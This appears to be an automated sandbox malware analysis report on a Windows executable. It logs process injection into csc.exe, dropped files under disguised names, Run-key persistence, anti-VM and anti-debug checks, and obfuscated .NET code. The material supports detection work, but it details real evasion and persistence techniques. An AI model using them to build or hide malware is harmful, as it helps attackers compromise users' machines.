Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: sentinelisabadedrtrynexttimemaybe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Detected unpacking (creates a PE file in dynamic memory)

Source: hCJ8gK9kNn.exe

Static file information: File size 3136512 > 1048576

Source: hCJ8gK9kNn.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x219c00

Source: hCJ8gK9kNn.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdb source: hCJ8gK9kNn.exe, OrionLegacyCLI.exe.0.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006F28000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3319832451.0000000009C30000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008333000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Srlfeb.pdb source: csc.exe, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3319168646.0000000009360000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000007F5C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006F28000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3319832451.0000000009C30000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008333000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdbP2N source: hCJ8gK9kNn.exe, OrionLegacyCLI.exe.0.dr
Source:	Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3319168646.0000000009360000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000007F5C000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Unpacked PE file: 0.2.hCJ8gK9kNn.exe.2650000.2.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.hCJ8gK9kNn.exe.25b0000.1.raw.unpack, ResponderElement.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.3.csc.exe.7f5ece8.4.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	.Net Code: Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777250)),Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777305))})
Source: 3.3.csc.exe.7ffed08.1.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	.Net Code: Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777250)),Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777305))})

.NET source code contains potential unpacker

Source: 0.2.hCJ8gK9kNn.exe.25b0000.1.raw.unpack, MapAnalyzer.cs	.Net Code: IncludeMap System.Reflection.Assembly.Load(byte[])
Source: 3.2.csc.exe.9510000.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 3.2.csc.exe.9510000.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 3.2.csc.exe.9510000.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 3.2.csc.exe.9510000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 3.2.csc.exe.9510000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 3.3.csc.exe.83339e8.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.3.csc.exe.83339e8.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.3.csc.exe.83339e8.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 3.2.csc.exe.7ee6ca8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.csc.exe.94b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3318680786.0000000007E62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3319366859.00000000094B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3317409163.0000000006CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csc.exe PID: 3672, type: MEMORYSTR

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"			Jump to behavior

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_0047F5D0 push eax; ret	0_2_0047F5E4
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_0047F5D0 push eax; ret	0_2_0047F60C
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00484767 push ecx; ret	0_2_00484777
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00483E84 push eax; ret	0_2_00483EA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0943BACF push cs; retf	3_2_0943BAD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09431700 pushfd ; retf	3_2_0943180D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0943068B push 8B000001h; iretd	3_2_09430690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09560158 pushad ; iretd	3_2_09560159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0956D606 pushad ; retf	3_2_0956D639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0978FE88 push es; ret	3_2_0978FF40

Source: 3.3.csc.exe.7f5ece8.4.raw.unpack, nVJXBHQlPK5MbsS3eA3.cs	High entropy of concatenated method names: 'BBcQRftNqD', 'd2TQqB3jnD', 'jnkQxcPWSg', 'C8qQ68cUX4', 'HmGQBW2KGL', 'laMQMe27VV', 'ho4Q5k8pLU', 'q2SQG9KEgk', 'TYpQhxCh2I', 'y4YQP4BKHw'
Source: 3.3.csc.exe.7f5ece8.4.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	High entropy of concatenated method names: 'OfbSv8rvP8IwIGTU9i5', 'OnVoiRrcqCKf9Oa5MKD', 'wCYQpIFDtr', 'vh0ry9Sq2v', 'knSQNj5fu2', 'hDnQXpIt5a', 's6NQQGkJ2u', 'uL3QCnlUTe', 'zAksN7Kboq', 'nEuN7jDDgS'
Source: 3.3.csc.exe.7f5ece8.4.raw.unpack, h5gmjUDfwmEIIaJIRm.cs	High entropy of concatenated method names: 'qJXkK5FGP', 'y5n3tVyRy', 'mpsWotT5h', 'Q151kS8re', 'C5oHI4ky5', 'FE4TwCkUE', 'RsKB315Ts', 'Y3UjapZQ9', 'cTvE9yeC7', 'JuXRGSDIb'
Source: 3.3.csc.exe.7f5ece8.4.raw.unpack, mD3UqCQfvhthrqY1XLA.cs	High entropy of concatenated method names: 'kZVmBcn3nH', 'c6mmMubrE1', 'rLcm5NIp7U', 'Cs1mG384O5', 'd5amh5XGlj', 'XjOmPwBtBp', 'y0amf6i8QU', 'L2LCL2ZT7K', 'qXwmUSxH1y', 'dCEm4raWXl'
Source: 3.3.csc.exe.7ffed08.1.raw.unpack, nVJXBHQlPK5MbsS3eA3.cs	High entropy of concatenated method names: 'BBcQRftNqD', 'd2TQqB3jnD', 'jnkQxcPWSg', 'C8qQ68cUX4', 'HmGQBW2KGL', 'laMQMe27VV', 'ho4Q5k8pLU', 'q2SQG9KEgk', 'TYpQhxCh2I', 'y4YQP4BKHw'
Source: 3.3.csc.exe.7ffed08.1.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	High entropy of concatenated method names: 'OfbSv8rvP8IwIGTU9i5', 'OnVoiRrcqCKf9Oa5MKD', 'wCYQpIFDtr', 'vh0ry9Sq2v', 'knSQNj5fu2', 'hDnQXpIt5a', 's6NQQGkJ2u', 'uL3QCnlUTe', 'zAksN7Kboq', 'nEuN7jDDgS'
Source: 3.3.csc.exe.7ffed08.1.raw.unpack, h5gmjUDfwmEIIaJIRm.cs	High entropy of concatenated method names: 'qJXkK5FGP', 'y5n3tVyRy', 'mpsWotT5h', 'Q151kS8re', 'C5oHI4ky5', 'FE4TwCkUE', 'RsKB315Ts', 'Y3UjapZQ9', 'cTvE9yeC7', 'JuXRGSDIb'
Source: 3.3.csc.exe.7ffed08.1.raw.unpack, mD3UqCQfvhthrqY1XLA.cs	High entropy of concatenated method names: 'kZVmBcn3nH', 'c6mmMubrE1', 'rLcm5NIp7U', 'Cs1mG384O5', 'd5amh5XGlj', 'XjOmPwBtBp', 'y0amf6i8QU', 'L2LCL2ZT7K', 'qXwmUSxH1y', 'dCEm4raWXl'

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	File created: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	File created: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea			Jump to behavior

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI	Jump to behavior
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea	Jump to behavior

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00412630 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,		0_2_00412630
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00478ECF IsIconic,GetWindowPlacement,GetWindowRect,		0_2_00478ECF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: csc.exe PID: 3672, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 4DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 6CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 69A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 544234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 360000	Jump to behavior

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Dropped PE file which has not been started: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Dropped PE file which has not been started: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe			Jump to dropped file

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

API coverage: 0.1 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4352	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4352	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6768	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6768	Thread sleep count: 156 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4352	Thread sleep time: -544234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 3760	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe TID: 1976	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe TID: 1976	Thread sleep time: -67500s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_0045E300 GetSystemTimeAsFileTime,GetModuleFileNameA,lstrcpyA,GetUserNameA,lstrcpyA,GetSystemInfo,GlobalMemoryStatus,

0_2_0045E300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 544234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 360000	Jump to behavior

Source: csc.exe, 00000003.00000003.1875083635.0000000008333000.00000004.00000800.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000002.2147868994.00000000134D0000.00000004.00001000.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000000.1880838318.0000000000401000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.6.dr	Binary or memory string: /COMPAQEMU
Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: csc.exe, 00000003.00000002.3316487167.0000000004EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_0045ECD0 EnterCriticalSection,IsDebuggerPresent,DebugBreak,GetLocalTime,CreateFileA,LeaveCriticalSection,SetFilePointer,GetCurrentThreadId,GetCurrentThreadId,WriteFile,WriteFile,WriteFile,CloseHandle,LeaveCriticalSection,

0_2_0045ECD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Memory allocated: page read and write | page guard

Allocates memory in foreign processes

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 46D0000 protect: page execute and read and write

Contains functionality to prevent local Windows debugging

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_0045ECD0 EnterCriticalSection,IsDebuggerPresent,DebugBreak,GetLocalTime,CreateFileA,LeaveCriticalSection,SetFilePointer,GetCurrentThreadId,GetCurrentThreadId,WriteFile,WriteFile,WriteFile,CloseHandle,LeaveCriticalSection,		0_2_0045ECD0
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_0045EED0 IsDebuggerPresent,DebugBreak,EnterCriticalSection,LeaveCriticalSection,		0_2_0045EED0

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 46D0000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Memory written: C:\Users\user\AppData\Local\Temp\dyfwtd.exe base: D0000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 46D0000			Jump to behavior
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 48DB008			Jump to behavior

Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /12/12 11:36:26 Program Manager]
Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerB
Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerm
